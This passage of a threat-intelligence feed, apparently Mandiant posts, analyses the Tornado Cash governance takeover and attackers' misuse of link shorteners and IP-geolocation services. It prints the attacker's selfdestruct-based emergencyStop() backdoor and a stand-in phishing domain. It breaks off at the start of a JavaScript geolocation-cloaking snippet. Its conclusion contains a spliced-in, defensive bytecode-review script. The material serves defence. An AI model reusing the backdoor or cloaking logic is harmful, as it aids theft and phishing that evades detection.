On April 4, 2023, The Euler Foundation released a statement regarding the theft of $200 million in assets, stating that after successful negotiations, all recoverable funds were returned. While this is one of the largest recoveries of stolen digital assets to date, it also presented a challenge to the DeFi insurer </span><a href="https://www.coindesk.com/business/2023/04/12/top-defi-insurer-paid-millions-to-euler-hack-victims-now-nexus-mutual-wants-its-money-back/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Nexus Mutual who had paid out claims</span></a><span style="vertical-align: baseline;"> to victims of the Euler hack.</span></p> <h2><span style="vertical-align: baseline;">Governance Attack</span></h2> <p><span style="vertical-align: baseline;">Many decentralized autonomous organizations (DAOs) utilize permissionless voting with a fungible and tradable native token for governance. Governance systems are designed to allow token holders to participate in decision-making about the project, such as which proposals to fund or which changes to make to the protocol. A "</span><a href="https://a16zcrypto.com/posts/article/dao-governance-attacks-and-how-to-avoid-them/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">governance attack</span></a><span style="vertical-align: baseline;">" targets the permissionless voting governance system of a DAO such that an attacker can gain control of the project. Governance attacks can be very damaging to Web3 projects because they can lead to loss of funds, disruption of the project, and even the project's collapse.</span></p> <p><span style="vertical-align: baseline;">One common method of performing a governance attack is to acquire a large number of a project's tokens, giving an attacker a significant amount of voting power. 
Once they have enough voting power, an attacker can propose and vote on malicious proposals, such as draining the project's treasury or changing the rules of the protocol to benefit themselves.</span></p> <h4><span style="vertical-align: baseline;">Tornado Cash Governance Attack</span></h4> <p><span style="vertical-align: baseline;">In May 2023, the cryptocurrency mixer Tornado Cash fell victim to a hostile takeover via a governance attack that drained 10,000 TORN tokens, worth approximately $70,000. The attacker granted themself 1,200,000 votes, surpassing the estimated 700,000 legitimate votes, to give them full control of the Tornado Cash governance. </span></p> <p><span style="vertical-align: baseline;">The heist started with a malicious proposal transaction at </span><code style="vertical-align: baseline;">0x34605f1d6463a48b818157f7b26d040f8dd329273702a0618e9e74fe350e6e0d</code><span style="vertical-align: baseline;"> that claims to penalize relayers that are cheating the protocol. Despite stating the smart contract uses the same logic as one in a previously passed proposal, the new proposed smart contract contained an extra function named </span><code style="vertical-align: baseline;">emergencyStop()</code><span style="vertical-align: baseline;">. 
Although there was a five-day voting period, followed by a two-day execution delay, the issue within the proposal was not identified, and the attacker successfully socially engineered most members within the community to vote in favor of the proposal by tricking them through the proposal description.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/web3-heists-fig6b.max-1000x1000.png" alt="Description of the Tornado Cash Malicious Proposal"> <figcaption class="article-image__caption "><p data-block-key="h4bt8">Figure 6: Description of the Tornado Cash Malicious Proposal</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Invoking the new </span><code style="vertical-align: baseline;">emergencyStop()</code><span style="vertical-align: baseline;"> function triggers the </span><code style="vertical-align: baseline;">selfdestruct</code><span style="vertical-align: baseline;"> method used to terminate a contract, remove the bytecode from the Ethereum blockchain, and send any contract funds to a specified address. 
This process lets the attacker destroy the proposal contract, and its creating contract, such that they can update the proposal contract to a new malicious contract and perform the heist.</span></p></div> <div class="block-paragraph_advanced"><div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1" style="border-collapse: collapse; width: 99.9641%; margin-left: auto; margin-right: auto;"> <tbody> <tr> <td style="width: 98.1839%;"> <p><code style="vertical-align: baseline;">function emergencyStop() public onlyOwner {<br/></code><code style="vertical-align: baseline;"> <span style="background-color: #f9ab00;">selfdestruct</span></code><code style="vertical-align: baseline;">(payable(0));<br/></code><code style="vertical-align: baseline;">}</code></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 7: The Invoked </span><code style="vertical-align: baseline;">emergencyStop</code><span 
style="vertical-align: baseline;"> Function to Start the Overtaking of Tornado Cash Governance</span></span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Once the proposal was passed by voters, the attacker invoked the </span><code style="vertical-align: baseline;">emergencyStop()</code><span style="vertical-align: baseline;"> function and updated the original proposal logic to grant themselves newly minted votes and obtain complete control of the DAO. To receive ownership of the targeted contract in this case, the attacker changed the locked token balance of the contracts they controlled to 10,000 and transferred the tokens to their own address.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/web3-heists-fig8.max-1000x1000.png" alt="Changing of Locked Token Balance of Attacker Controlled Contracts to 10,000"> </a> <figcaption class="article-image__caption "><p data-block-key="vm3fd">Figure 8: Changing of Locked Token Balance of Attacker Controlled Contracts to 10,000</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Conclusion</span></h2> <p><span style="vertical-align: baseline;">An understanding of past compromises and evolving threats is critical to guard against future attacks and help safeguard digital assets. 
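One check a token holder could have run on the Tornado Cash proposal before voting is a bytecode review of the proposal contract, since the description claimed the same logic as an earlier, already-passed proposal. The following added example (not a tool from this post or from Tornado Cash) disassembles runtime bytecode, compares the function selectors the new contract dispatches on against the previously passed one, and flags a SELFDESTRUCT opcode. The two bytecode blobs and their selectors are constructed placeholders, not real deployed code or real keccak-256 selectors; the opcode values are the EVM's. It also shows why a plain search for the byte 0xff is not enough: a PUSH instruction's immediate data can contain 0xff without it being an instruction.

```python
"""Pre-vote review of a governance proposal's runtime bytecode.

Added example; not Tornado Cash's or Mandiant's tooling. The bytecode blobs
are constructed by hand (selectors are placeholder bytes, not real keccak-256
function selectors). Opcode values are the EVM's: PUSH1..PUSH32 = 0x60..0x7f,
PUSH4 = 0x63, DUP2 = 0x81, EQ = 0x14, PUSH2 = 0x61, JUMPI = 0x57, AND = 0x16,
SELFDESTRUCT = 0xff.
"""
PUSH1, PUSH4, PUSH32 = 0x60, 0x63, 0x7F
DANGEROUS = {0xFF: "SELFDESTRUCT"}


def _dispatch_entry(selector: bytes, dest: int) -> bytes:
    """PUSH4 <selector> DUP2 EQ PUSH2 <dest> JUMPI: one dispatcher comparison per external function."""
    return b"\x63" + selector + b"\x81\x14\x61" + dest.to_bytes(2, "big") + b"\x57"


# Previously passed proposal (constructed): one external function, then STOP.
OLD_PROPOSAL = _dispatch_entry(b"\x11\x11\x11\x11", 0x0020) + b"\x00"
# New proposal claiming the same logic (constructed): an extra selector and a
# body ending in PUSH1 0x00 SELFDESTRUCT, like emergencyStop() in the text.
# PUSH1 0xff AND is included so that one 0xff byte is data, not an opcode.
NEW_PROPOSAL = (_dispatch_entry(b"\x11\x11\x11\x11", 0x0020)
                + _dispatch_entry(b"\x22\x22\x22\x22", 0x0030)
                + b"\x60\xff\x16"
                + b"\x60\x00\xff")


def disassemble(code: bytes):
    """Yield (offset, opcode, immediate); PUSH immediates are skipped, not decoded as opcodes."""
    pc = 0
    while pc < len(code):
        op = code[pc]
        if PUSH1 <= op <= PUSH32:
            width = op - PUSH1 + 1
            yield pc, op, code[pc + 1:pc + 1 + width]
            pc += 1 + width
        else:
            yield pc, op, b""
            pc += 1


def function_selectors(code: bytes):
    """Selectors the dispatcher compares against (PUSH4 immediates)."""
    return {imm.hex() for _, op, imm in disassemble(code) if op == PUSH4 and len(imm) == 4}


def dangerous_opcodes(code: bytes):
    """Offsets of opcodes that should never appear in a proposal claiming unchanged logic."""
    return [(pc, DANGEROUS[op]) for pc, op, _ in disassemble(code) if op in DANGEROUS]


def byte_grep(code: bytes):
    """What a plain search for 0xff reports; it also hits data inside PUSH immediates."""
    return [i for i, b in enumerate(code) if b == 0xFF]


def review_proposal(old: bytes, new: bytes):
    """Diff the new proposal against the one it claims to copy."""
    return {
        "added_selectors": sorted(function_selectors(new) - function_selectors(old)),
        "dangerous": dangerous_opcodes(new),
    }


if __name__ == "__main__":
    print(review_proposal(OLD_PROPOSAL, NEW_PROPOSAL))
    print("naive byte search:", byte_grep(NEW_PROPOSAL))
```

On the constructed input the review reports one selector that the earlier proposal never dispatched on and a SELFDESTRUCT at offset 27, while the byte search also reports offset 23, which is the immediate of a PUSH1. For a real proposal the bytecode comes from the chain (eth_getCode against the proposal address) and the comparison baseline is the verified source or bytecode of the proposal it claims to reuse.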
As cryptocurrency and Web3 organizations expand, with platforms like </span><a href="https://cloud.google.com/web3"><span style="text-decoration: underline; vertical-align: baseline;">Google Cloud for Web3</span></a><span style="vertical-align: baseline;"> enabling innovation, they are frequently targeted, regardless of size, and there are typically earlier signs of compromise than the theft itself such as malware or suspicious logins. Organizations must evaluate their security posture and should consider leveraging advanced security solutions, such as </span><a href="https://cloud.google.com/security/products/security-operations"><span style="text-decoration: underline; vertical-align: baseline;">Google Security Operations</span></a><span style="vertical-align: baseline;">, to enable sufficient logging, alerting, and comprehensive incident response investigations to detect attacks and help prevent heists.</span></p></div></description><pubDate>Tue, 03 Sep 2024 14:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/examining-web3-heists/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>DeFied Expectations — Examining Web3 Heists</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/examining-web3-heists/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author></item><item><title>A Measure of Motive: How Attackers Weaponize Digital Analytics Tools</title><link>https://cloud.google.com/blog/topics/threat-intelligence/how-attackers-weaponize-digital-analytics-tools/</link><description><div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Adrian McCabe, Ryan Tomcik, Stephen Clement</span></p> <hr/></div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: 
baseline;">Introduction</span></h2> <p><span style="vertical-align: baseline;">Digital analytics tools are vital components of the vast domain that is modern cyberspace. From system administrators managing traffic load balancers to marketers and advertisers working to deliver relevant content to their brand’s biggest fan base, tools like link shorteners, location trackers, CAPTCHAs, and digital advertising platforms each play their part in making information universally accessible and useful to all.</span></p> <p><span style="vertical-align: baseline;">However, just as these tools can be used for good, they can also be used for malicious purposes. Mandiant and Google Cloud researchers have witnessed threat actors cleverly repurposing digital analytics and advertising tools to evade detection and amplify the effectiveness of their malicious campaigns.</span></p> <p><span style="vertical-align: baseline;">This blog post dives deep into the threat actor playbook, revealing how these tools can be weaponized by attackers to add malicious data analytics (“malnalytics”) capabilities to their threat campaigns. We'll expose the surprising effectiveness of these tactics and arm defenders with detection and mitigation strategies for their own environments.</span></p> <h2><span style="vertical-align: baseline;">Get Shor.ty</span></h2> <p><span style="vertical-align: baseline;">First entering the scene around the year 2000 and steadily gaining in popularity ever since, link shorteners have become a fairly ubiquitous utility for life on the Internet. 
In addition to the popular link shortening services like bit.ly and rb.gy, large technology companies like Amazon (a.co) and Google (goo.gl) also have (or had, in </span><a href="https://developers.googleblog.com/en/google-url-shortener-links-will-no-longer-be-available/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google’s case</span></a><span style="vertical-align: baseline;">) their own link shortening structures and schemas. In the legitimate advertising and marketing sense, link shorteners are typically used as a mechanism to track things like click-through rates on advertisements, or to reduce the likelihood that a complicated URL with parameterized arguments will get mangled when being shared. However, link shorteners and link shortening services have also been used by threat actors (</span><a href="https://attack.mitre.org/techniques/T1608/005/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">MITRE ATT&amp;CK Technique T1608.005</span></a><span style="vertical-align: baseline;">) to obscure the URLs of malicious landing pages, and Mandiant has observed threat actors using link shorteners to redirect victims during the initial access phase of an attack chain. 
Some recent examples include: </span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">A link shortener service used by UNC1189 (also known as “MuddyWater”) in spring of 2022 to funnel users to a phishing lure document hosted on a cloud storage provider.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">A set of SMS phishing campaigns orchestrated by a financially motivated threat actor between spring of 2021 and late 2022, which leveraged link shorteners to funnel users through a nested web of device, location, and browser checks to a set of forms that ultimately attempt to steal credit card information.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">A malvertising campaign in spring of 2023 that leveraged a link shortener to track click-through data for Dropbox URLs hosting malware payloads. </span></p> </li> </ul> <h3><span style="vertical-align: baseline;">Behind the ma.sk</span></h3> <p><span style="vertical-align: baseline;">To demonstrate the capabilities of a link shortener service from a threat actor perspective, the service bit.ly will be featured in this blog post. Originally made popular on X (formerly Twitter) around 2008, bit.ly remains a popular link shortening solution. 
Like most modern software-as-a-service (SaaS) platforms, bit.ly offers multiple subscription levels based around levels of usage and feature availability (Figure 1).</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/weaponize-digital-analytics-tools-fig1.max-1000x1000.png" alt="bit.ly subscription page"> </a> <figcaption class="article-image__caption "><p data-block-key="5gqqt">Figure 1: bit.ly subscription page</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">In an attempt to avoid direct attribution, threat actors may use fake or stolen personal and/or payment information to complete the registration for such a subscription or service. Once the setup process has been completed, attackers can begin to generate shortened links (Figure 2).</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/weaponize-digital-analytics-tools-fig2.max-1000x1000.png" alt="bit.ly destination URL configuration"> </a> <figcaption class="article-image__caption "><p data-block-key="5gqqt">Figure 2: bit.ly destination URL configuration</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/weaponize-digital-analytics-tools-fig3.max-1000x1000.png" alt="bit.ly customized URL configuration"> </a> <figcaption 
class="article-image__caption "><p data-block-key="5gqqt">Figure 3: bit.ly customized URL configuration</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">As part of some bit.ly subscription levels, custom fields can be appended to URLs as parameters to gain further insights into their associated activity (see the “Custom URL parameter name” field and value pair in Figure 4). This feature set is obviously quite beneficial for social media brand influencers, marketers, and advertisers, but attackers can use this functionality to get added insights into their campaign activities.</span></p> <p><span style="vertical-align: baseline;">In this fictitious example, let’s say an attacker intends to use a shortened bit.ly link as part of a larger SMS phishing campaign targeting phone numbers within the “703” area code. When opened, the link will direct users to an attacker-controlled fake payment site enticing the user to pay urgent outstanding invoices.</span></p> <p><span style="vertical-align: baseline;">The attacker can configure parameters (Figure 4) to generate an Urchin Tracking Module (UTM) URL specific to this component of the phishing campaign (Figure 5) for tracking purposes. 
This bit.ly article contains more information on the </span><a href="https://bitly.com/blog/utm-parameters/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">legitimate use of these types of URL data fields</span></a><span style="vertical-align: baseline;">.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/weaponize-digital-analytics-tools-fig4.max-1000x1000.png" alt="Customized UTM parameter configuration"> </a> <figcaption class="article-image__caption "><p data-block-key="5gqqt">Figure 4: Customized UTM parameter configuration</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/weaponize-digital-analytics-tools-fig5.max-1000x1000.png" alt="Parameterized URL structure with UTM fields"> </a> <figcaption class="article-image__caption "><p data-block-key="5gqqt">Figure 5: Parameterized URL structure with UTM fields</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Though attackers typically would not have such fields in the URL parameters for their campaign infrastructure as overtly labeled as the example in Figure 5, the effectiveness of leveraging such online marketing integrations and data fields is readily apparent. In this scenario: </span></p> <ul> <li role="presentation"><strong style="vertical-align: baseline;">Source</strong><span style="vertical-align: baseline;"> is a designator for a list of active phone numbers that can receive SMS messages. 
While the list itself and the infrastructure to send the messages would reside outside of bit.ly, bit.ly can be used to correlate the corresponding click-through activity through these URL parameters.</span></li> <li role="presentation"><strong style="vertical-align: baseline;">Medium</strong><span style="vertical-align: baseline;"> is the mechanism by which a victim would be exposed to the link. In this case, “sender_1” would let the attacker correlate a downstream victim with the phone number in the attacker’s infrastructure that originally sent them the message.</span></li> <li role="presentation"><strong style="vertical-align: baseline;">Campaign</strong><span style="vertical-align: baseline;"> is the aggregated bucket of related activity visible within bit.ly. An individual campaign can have many different links tied to it, and the activity of all of them can be tracked together.</span></li> <li role="presentation"><strong style="vertical-align: baseline;">Term</strong><span style="vertical-align: baseline;"> is an optional field that advertisers legitimately use to map search engine keywords or terms to strategically placed bit.ly links.</span></li> <li role="presentation"><strong style="vertical-align: baseline;">Custom URL parameter name - targeting_area_code, 703: </strong><span style="vertical-align: baseline;">This is an entirely customized bit.ly field included for the purposes of this scenario that signifies which area code the attacker will be targeting with this specific link. In this case, the attacker will be targeting residents of Northern Virginia in the Washington, D.C. metropolitan area.</span></li> </ul> <p><span style="vertical-align: baseline;">After these parameters are selected and the bit.ly links are fully configured, attackers can put their links into action. 
Once a campaign is underway and links are distributed through their medium of choice, attackers can monitor the activity to their shortened links using a dashboard interface (Figure 6).</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/weaponize-digital-analytics-tools-fig6.max-1000x1000.png" alt="bit.ly click-through analytics dashboard"> </a> <figcaption class="article-image__caption "><p data-block-key="5gqqt">Figure 6: bit.ly click-through analytics dashboard</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Defending Against Attacks Leveraging Link Shorteners</span></h3> <p><span style="vertical-align: baseline;">Given the fairly ubiquitous nature of link shorteners, unilaterally blocking them from use within an environment is generally inadvisable as this decision would likely impact both productivity and user experience. 
Instead, defenders should consider implementing some form of automated analysis around them that has the ability to detect behavioral conditions, such as:</span></p> <ul> <li role="presentation"><span style="vertical-align: baseline;">If the shortened URL goes to a second/nested shortened URL on different infrastructure</span></li> <li role="presentation"><span style="vertical-align: baseline;">If the same shortened URL has appeared multiple times in a short timespan in telemetry data associated with different hosts within an environment</span></li> <li role="presentation"><span style="vertical-align: baseline;">If the URL goes directly to an executable or archive file on a cloud-hosting service or a file with a “non-standard” file type (e.g., .REV file)</span></li> </ul> <p><span style="vertical-align: baseline;">Additionally, it’s possible to identify suspicious behavioral patterns in network telemetry that may indicate link shortener abuse. As part of this exercise, we reviewed the network telemetry associated with two simulated attack chains leveraging a bit.ly URL as an Initial Infection Vector (IIV) and identified some viable elements of the traffic around which to potentially build detections or hunting strategies:</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; 
overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">Attack Configuration</span></strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">Network Requests</span></strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">Hunting Strategy</span></strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; 
padding: 16px;"> <p><span style="vertical-align: baseline;">bit.ly -&gt; Credential Harvesting Page (afakeloginpage[.]xyz)</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">00:00:00</span><span style="vertical-align: baseline;"> - init Client Hello (TLS), bit.ly</span></p> <p><span style="vertical-align: baseline;">00:00:00</span><span style="vertical-align: baseline;"> - init DNS resolution request, afakeloginpage[.]xyz</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">In bit.ly’s particular case, there is minimal delay (milliseconds) between the time a host initiates a connection via Client Hello and the time that the host initiates the DNS resolution for its final destination. If any DNS resolution telemetry is evident for a suspicious domain within such close proximity to bit.ly traffic (particularly for domains with non-standard TLDs like “.site,” “.xyz,” “.top,” or “.lol”), consider investigating the activity further.</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">bit.ly -&gt; zip file hosted on Google Drive</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">00:00:00 - init Client Hello (TLS), bit.ly</span></p> <p><span style="vertical-align: baseline;">00:00:00 - DNS resolution request, drive.google[.]com</span></p> <p><span style="vertical-align: baseline;">00:00:00 - Client Hello, drive.google[.]com</span></p> <p><span style="vertical-align: baseline;">00:00:00 - DNS resolution request, drive[.]usercontent[.]google[.]com</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Similar to the aforementioned example, there is 
minimal delay (milliseconds) between the time a host initiates a connection via Client Hello for bit.ly and when it attempts to connect to and/or make domain resolutions for the domains drive.google.com and drive.usercontent.google.com. Any occurrence of these three domains being accessed from a given host in quick succession likely means that a remote file was accessed via a bit.ly link, and additional investigation into the associated host may be warranted. This detection approach can also be generalized by looking for the co-occurrence of network requests for a bit.ly URL followed by a domain categorized by a firewall or proxy device as online storage or file sharing.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 1: Simulated bit.ly attack telemetry analysis</span></div></div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">The World in a String: Weaponized IP Geolocation Utilities</span></h2> <p><span style="vertical-align: baseline;">IP geolocation utilities can be used legitimately by advertisers and marketers to gauge the geo-dispersed impact of advertising reach and the effectiveness of marketing funnels (albeit with varying levels of granularity and data availability). However, Mandiant has observed IP geolocation utilities used by attackers (</span><a href="https://attack.mitre.org/techniques/T1614/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">MITRE ATT&amp;CK Technique T1614</span></a><span style="vertical-align: baseline;">). 
Some real-world attack patterns that Mandiant has observed leveraging IP geolocation utilities include:</span></p> <ul> <li role="presentation"><span style="vertical-align: baseline;">Malware payloads connecting to geolocation services for infection tracking purposes upon successful host compromise, </span><a href="https://www.bleepingcomputer.com/news/security/kraken-cryptor-ransomware-connecting-to-bleepingcomputer-during-encryption/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">such as with the Kraken Ransomware</span></a><span style="vertical-align: baseline;">. This allows attackers a window into how fast and how far their campaign is spreading.</span></li> <li role="presentation"><span style="vertical-align: baseline;">Malware conditionally performing malicious actions based on IP geolocation data. This functionality allows attackers a level of control around their window of vulnerability and ensures they do not engage in “friendly fire” if their motivations are geo-political in nature, such as indiscriminate nation-state targeting by hacktivists. An example of this technique can be seen in the case of the TURKEYDROP variant of the Adwind malware, which attempts to surgically target systems located in Turkey. </span></li> <li role="presentation"><span style="vertical-align: baseline;">Threat actors placing access restrictions on phishing lure pages and second-stage malware downloads based on IP ranges (</span><a href="https://cloud.google.com/blog/topics/threat-intelligence/caffeine-phishing-service-platform/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">a feature of the Caffeine PhaaS platform</span></a><span style="vertical-align: baseline;">). 
This allows attackers a limited defensive mechanism against having their campaign infrastructure identified and mitigated too rapidly.</span></li> </ul> <p><span style="vertical-align: baseline;">Though elegantly simple, these capabilities are vital for attackers to gain insights into their active campaigns and to prolong their campaigns’ duration and effectiveness.</span></p> <h3><span style="vertical-align: baseline;">How2DoUn2Others</span></h3> <p><span style="vertical-align: baseline;">Though there are many examples of IP-based geolocation utilities that have been used by attackers, for illustrative purposes the example shown here will use ip2location.io.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/weaponize-digital-analytics-tools-fig7.max-1000x1000.png" alt="Ip2Location.io subscription page"> </a> <figcaption class="article-image__caption "><p data-block-key="ktvmy">Figure 7: Ip2Location.io subscription page</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">ip2location.io has a fairly robust feature set (Figure 7) with a free version offering a dedicated API key with respectable limits and upper tier subscriptions offering progressively granular insights into the IP address query results that would be useful to attackers. 
Using ip2location.io, it is possible to determine things like: </span></p> <ul> <li role="presentation"><span style="vertical-align: baseline;">If the connecting entity’s IP address falls within an IP netblock owned by a specific company</span></li> <li role="presentation"><span style="vertical-align: baseline;">Currency associated with the locale of the connecting entity</span></li> <li role="presentation"><span style="vertical-align: baseline;">If the connecting entity is using a VPN</span></li> <li role="presentation"><span style="vertical-align: baseline;">If the connecting entity is using Tor</span></li> </ul> <p><span style="vertical-align: baseline;">From an attacker’s perspective, the main value of this kind of tooling comes from wiring its results into programmatic actions that both optimize targeting and evade detection. In the following example code snippet, a simple webpage is configured with JavaScript to perform a lookup using the ip2location.io API and redirect users to different pages based on their locale or connection type. If the user is connecting from a country outside the United States, it will show them an otherwise innocuous page. If the user is connecting from inside the U.S. and is not using a VPN or Tor (in contrast to some analysis sandbox environments), then they will be directed to a malicious webpage. 
If they are using a VPN or Tor, they will be shown an error page.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>&lt;script type="module"&gt;
  // Ask ip2location.io about the visitor's own IP (no ip= parameter means "the caller");
  // &lt;key&gt; is the attacker's API key.
  let raw_response = await fetch('https://api.ip2location.io/?key=&lt;key&gt;&amp;format=json');
